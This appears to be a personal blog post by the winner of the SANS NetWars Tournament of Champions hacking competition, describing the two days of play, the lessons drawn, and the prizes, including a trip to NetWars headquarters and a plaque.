NetwarsThe competitive atmosphere was palpable and as the tournament began ramping up you could very nearly taste the excitement in the air. It was obvious when the scoring servers opened, because one hundred or so giddy hackers were instantaneously shrouded in a mantle of silence. Game time! I battled my way through progressively challenging obstacles to the beat of some of the most… interesting… music I’ve ever heard in my life, but at the end of day one I was actually only in 9th place overall. Walking back into the room on day two instantly transported you back into the zone, and if our monotone responses to Ed Skoudis’ enthusiastic questions were anything to judge by; we were raring to go. When they finally released the hounds, it was as if we had immediately run into a brick wall. The new NetWars is much more difficult than its predecessor. I’d have to say that that is what helped me; when things got hard I started to shine.

Exposure, if there were a word for what I took away from NetWars that would be it. While trolling the Internet for tricks and practicing them against your own network is great, I really think that the best way to develop the critical thinking skills necessary to be a real threat, is to be confronted with something new. The bad guys have it easy. There is an overabundance of new yet juicy targets for them to interdict, readily available on the web. For the ethical hackers among us acquiring this experience is much more difficult, and we need it if we are to keep the wolves at bay. NetWars Tournament of Champions was an all-new sequence of challenges that forced you to evaluate the problem, hypothesize potential solutions, and finally break in. There are few ways to improve your tradecraft that can compare.

On to the spoils! Everyone invited to the Tournament of Champions received exceedingly nifty, yet awkward to wear, sound activated, flashing shirts. Unintended bonus, you can swap in the batteries from your shirt if your Bluetooth keyboard runs out of juice, nice!

Grand prize at NetWars Tournament of Champions – The Golden Ticket:

goldenticket2You have won FIRST PLACE in the second annual SANS NetWars Tournament of Champions, an achievement of outstanding, astonishing proportions. Through in-depth knowledge, cutting-edge skills, and deep cunning, you secured victory!

As the ultimate winner, winner you will enjoy a trip to spend an amazingly geektastic day at NetWars Research World Headquarters. You’ll observe first-hand the NetWars super-secret lair and command center. Your exclusive travel voucher is valid for up to $500 in flight costs, plus one night of hotel accommodations, and entitles you to spend a full day with Ed Skoudis and his team, seeing how they design, build, and operate SANS NetWars challenges.

It gets even better. You’ll tour the steam punk office, a perfect blend of 1880’s design and cutting-edge technology, infused with a collection of historical crypto systems and curious gadgets. Your adventure will include the Secret Room, the Secret-Secret Room, and experiments with a genuine World War Two Enigma machine. You’ll also feast with Ed and the team at a nearby restaurant, geeking out with in-depth discussions of all things infosec.

But, wait, there’s more! Best of all, during your special day, you’ll get to experience the new SANS NetWars CyberCity. This miniaturized town, chock full of NetWars missions, is our most ambitious challenge ever, designed to teach cyber warriors how cyber action can have kinetic effect against real-world systems. As the ultimate NetWars champion, you’ll get serious bragging rights as you complete several CyberCity missions!

Hereby duly signed, with hearty congratulations, by:

Ed Skoudis, Yori Kvitchko

I also received a plaque commemorating my victory:

championplaque2

Finally, the scoreboard at the end of the competition!

NetWarsScoreboard